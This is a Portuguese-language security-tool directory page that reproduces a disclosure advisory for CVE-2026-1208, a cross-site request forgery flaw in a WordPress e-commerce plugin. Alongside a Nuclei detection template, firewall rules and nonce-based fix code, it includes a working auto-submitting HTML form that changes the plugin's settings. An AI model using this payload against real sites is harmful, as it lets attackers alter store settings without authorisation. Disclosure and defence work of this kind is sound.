Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-1208 — Friendly Functions para Welcart <= 1.2.5 - Falsificação de Solicitação Entre Sites para Atualização de Configurações | Kitploit
Ferramentas/GitHubGitHub/snailsploit/cve-2026-1208
Análise de VulnerabilidadesExploraçãoSegurança WebTestes de PenetraçãoPapers e PesquisaAprendizado e Educação
GitHubsnailsploit/cve-2026-1208

CVE-2026-1208

Friendly Functions para Welcart <= 1.2.5 - Falsificação de Solicitação Entre Sites para Atualização de Configurações

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-1208: Falsificação de Solicitação entre Sites no Friendly Functions for Welcart

CVE CVSS Score WordPress Plugin CWE-352 Wordfence

Palavras-chave: CVE-2026-1208, vulnerabilidade no Friendly Functions for Welcart, CSRF, Falsificação de Solicitação entre Sites, segurança WordPress, vulnerabilidade de plugin WordPress, CWE-352, segurança Welcart, manipulação de configurações, WordPress CVE 2026

Índice

  • Visão Geral
  • Detalhes da Vulnerabilidade
  • Análise Técnica
  • Vetor de Ataque
  • Prova de Conceito
  • Guia de Remediação
  • Métricas CVSS
  • Referências
  • Contato de Segurança
  • Visão Geral

    Vulnerabilidade de CSRF no Plugin WordPress Friendly Functions for Welcart (CVE-2026-1208) - Falha de segurança que permite que atacantes não autenticados modifiquem as configurações do plugin por meio de solicitações forjadas.

    Uma vulnerabilidade de Falsificação de Solicitação entre Sites (CSRF) foi descoberta no plugin Friendly Functions for Welcart, que permite que atacantes não autenticados atualizem as configurações do plugin enganando um administrador para clicar em um link malicioso.

    Descoberto por: Kai Aizen (SnailSploit)
    Publicado: 23 de janeiro de 2026
    Pontuação CVSS: 4.3 (Média)
    CWE: CWE-352 - Falsificação de Solicitação entre Sites (CSRF)
    Plugin: Friendly Functions for Welcart
    Tipo de Ataque: Falsificação de Solicitação entre Sites para Atualização de Configurações
    Privilégios Necessários: Nenhum (Ataque Não Autenticado + Engenharia Social)

    Detalhes da Vulnerabilidade

    Descrição

    O plugin Friendly Functions for Welcart para WordPress é vulnerável a Falsificação de Solicitação entre Sites em todas as versões até, e incluindo, 1.2.5. Isso se deve à validação de nonce ausente ou incorreta na página de configurações. Isso possibilita que atacantes não autenticados atualizem as configurações do plugin por meio de uma solicitação forjada, desde que consigam enganar um administrador do site para executar uma ação como clicar em um link.

    Impacto

    Esta vulnerabilidade permite que atacantes não autenticados:

    • Modifiquem as configurações do plugin sem autorização
    • Manipulem a funcionalidade de e-commerce do Welcart
    • Potencialmente interrompam as operações da loja
    • Encadeiem com outras vulnerabilidades para ataques escalados

    Versões Afetadas

    • Vulnerável: Todas as versões ≤ 1.2.5
    • Corrigido: Versão 1.2.6 e superior

    Métricas CVSS v3.1

    root@kitploit:~
    CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    
    MétricaValor
    Vetor de AtaqueRede (AV:N)
    Complexidade de AtaqueBaixa (AC:L)
    Privilégios NecessáriosNenhum (PR:N)
    Interação do UsuárioNecessária (UI:R)
    EscopoInalterado (S:U)
    ConfidencialidadeNenhuma (C:N)
    IntegridadeBaixa (I:L)
    DisponibilidadeNenhuma (A:N)

    Detalhes Técnicos

    A vulnerabilidade existe na implementação da página de configurações, onde:

    1. O formulário de configurações do plugin não possui validação de nonce adequada
    2. As solicitações de atualização de configurações são processadas sem verificar a origem da solicitação
    3. Nenhum token CSRF é gerado ou validado
    4. Ações administrativas podem ser executadas por meio de solicitações entre origens

    Locais do Código Vulnerável

    A vulnerabilidade foi identificada nos seguintes locais:

    • ffw_function_settings.php - Linha 53
    • ffw_function_settings.php - Linha 58

    Vetor de Ataque

    O ataque requer engenharia social para enganar um administrador autenticado a visitar uma página maliciosa ou clicar em um link malicioso enquanto estiver conectado ao seu site WordPress.

    root@kitploit:~
    Target: WordPress Admin with Friendly Functions for Welcart installed
    Method: Malicious HTML page with auto-submitting form
    Trigger: Administrator clicks link or visits attacker-controlled page
    

    Prova de Conceito

    Payload HTML de CSRF

    root@kitploit:~
    <!DOCTYPE html>
    <html>
    <head>
        <title>CVE-2026-1208 - CSRF PoC</title>
    </head>
    <body>
        <h1>Loading...</h1>
        <form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
            <input type="hidden" name="ffw_setting_option" value="malicious_value" />
            <!-- Add additional setting fields as needed -->
        </form>
        <script>
            document.getElementById('csrf-form').submit();
        </script>
    </body>
    </html>
    

    ⚠️ Aviso: Este PoC é fornecido apenas para fins educacionais e de testes autorizados.

    Etapas de Teste

    1. Configure uma instância do WordPress com Friendly Functions for Welcart <= 1.2.5
    2. Hospede o payload de CSRF em um servidor controlado pelo atacante
    3. Autentique-se como administrador no site WordPress alvo
    4. Visite a página controlada pelo atacante (simulando clicar em um link malicioso)
    5. Observe que as configurações do plugin são modificadas sem consentimento explícito

    Detecção

    Verificação do Plugin WordPress

    root@kitploit:~
    # Check if vulnerable version is installed
    wp plugin list | grep -i "friendly-functions-for-welcart"
    
    # Get specific version
    wp plugin get friendly-functions-for-welcart --field=version
    

    Regras do Scanner de Segurança

    Modelo Nuclei:

    root@kitploit:~
    id: CVE-2026-1208
    
    info:
      name: Friendly Functions for Welcart - CSRF to Settings Update
      author: SnailSploit
      severity: medium
      description: |
        Friendly Functions for Welcart plugin for WordPress is vulnerable 
        to CSRF in versions <= 1.2.5 due to missing nonce validation.
      reference:
        - https://github.com/SnailSploit/CVE-2026-1208
        - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
      classification:
        cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
        cvss-score: 4.3
        cve-id: CVE-2026-1208
        cwe-id: CWE-352
      tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart
    
    requests:
      - method: GET
        path:
          - "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
        
        matchers-condition: and
        matchers:
          - type: word
            words:
              - "Friendly Functions for Welcart"
          
          - type: regex
            regex:
              - "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
          
          - type: status
            status:
              - 200
    
        extractors:
          - type: regex
            name: version
            group: 1
            regex:
              - "(?i)Stable tag:\\s*([0-9.]+)"
    

    Regras do Firewall de Aplicação Web

    Regra ModSecurity:

    root@kitploit:~
    # CVE-2026-1208 - Block CSRF attempts to FFW settings
    SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
        "chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
        log,deny,status:403,msg:'CVE-2026-1208 CSRF Attempt Blocked'"
        SecRule ARGS:page "@streq ffw-settings" \
            "chain"
            SecRule &REQUEST_HEADERS:Referer "@eq 0"
    
    # Alternative: Block if referer doesn't match site domain
    SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
        "chain,id:2026002,phase:2,t:none,\
        log,deny,status:403,msg:'CVE-2026-1208 Cross-Origin Request Blocked'"
        SecRule ARGS:page "@streq ffw-settings" \
            "chain"
            SecRule REQUEST_HEADERS:Referer "!@contains yourdomain.com"
    

    Regra Nginx:

    root@kitploit:~
    # CVE-2026-1208 - CSRF Protection for FFW Settings
    location /wp-admin/admin.php {
        # Check for ffw-settings page without proper referer
        if ($arg_page = "ffw-settings") {
            set $csrf_check "1";
        }
        if ($http_referer !~ "^https?://(www\.)?yourdomain\.com") {
            set $csrf_check "${csrf_check}1";
        }
        if ($csrf_check = "11") {
            return 403;
        }
        
        # Pass to PHP handler
        try_files $uri =404;
        fastcgi_pass php-fpm;
        include fastcgi_params;
    }
    

    Remediação

    Para Administradores do Site

    Ação Imediata Necessária:

    1. Atualize para a versão 1.2.6 ou posterior do Friendly Functions for Welcart imediatamente
    2. Revise as configurações do plugin do seu site para verificar se há modificações não autorizadas
    3. Se você não puder atualizar imediatamente, considere desativar temporariamente o plugin

    Instruções de Atualização

    1. Navegue até Plugins > Plugins Instalados no administrador do WordPress
    2. Localize "Friendly Functions for Welcart"
    3. Clique em Atualizar Agora para atualizar para a versão 1.2.6 ou posterior
    4. Verifique se a atualização foi bem-sucedida
    5. Revise e confirme se as configurações do plugin estão corretas

    Para Desenvolvedores

    Garanta que todos os formulários de configurações implementem a proteção CSRF adequada:

    root@kitploit:~
    // Example of proper CSRF protection in WordPress
    // In your form:
    wp_nonce_field('ffw_settings_update', 'ffw_settings_nonce');
    
    // In your form handler:
    function process_settings_update() {
        // Verify nonce
        if (!isset($_POST['ffw_settings_nonce']) || 
            !wp_verify_nonce($_POST['ffw_settings_nonce'], 'ffw_settings_update')) {
            wp_die('Security check failed');
        }
        
        // Check capabilities
        if (!current_user_can('manage_options')) {
            wp_die('Unauthorized');
        }
        
        // Process settings update
        // ...
    }
    

    Linha do Tempo

    • 23 de janeiro de 2026 - Vulnerabilidade divulgada publicamente
    • 23 de janeiro de 2026 - CVE-2026-1208 atribuído
    • Versão 1.2.6 - Correção lançada pelo fornecedor do plugin

    Referências

    • Entrada no Banco de Dados de Inteligência Wordfence
    • WordPress Plugin Trac - Linha 53
    • WordPress Plugin Trac - Linha 58
    • Alterações do Plugin (Correção)
    • Entrada CVE no MITRE

    Créditos

    Pesquisador:

    • Kai Aizen - SnailSploit

    Processo de Divulgação: Coordenado por meio do Programa Bug Bounty da Wordfence

    Aviso Legal

    Estas informações são fornecidas apenas para fins de pesquisa de segurança e defesa. Qualquer exploração desta vulnerabilidade para fins maliciosos é ilegal e antiética. Sempre obtenha autorização adequada antes de testar sistemas que você não possui.

    Contato

    Para perguntas ou informações adicionais sobre esta vulnerabilidade:

    • E-mail: [email protected]
    • Site: snailsploit.com
    • Organização: SnailSploit Security Research

    Atualizado pela última vez: 23 de janeiro de 2026


    📚 Documentação e Autor

    O artigo completo deste projeto, metodologia e pesquisas relacionadas estão disponíveis em:

    https://snailsploit.com/security-research/cves/cve-2026-1208/

    Criado por Kai Aizen — pesquisador independente de segurança ofensiva.

    snailsploit.com · Pesquisa · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

    Mesmo ataque. Substrato diferente.

    Baixar ferramenta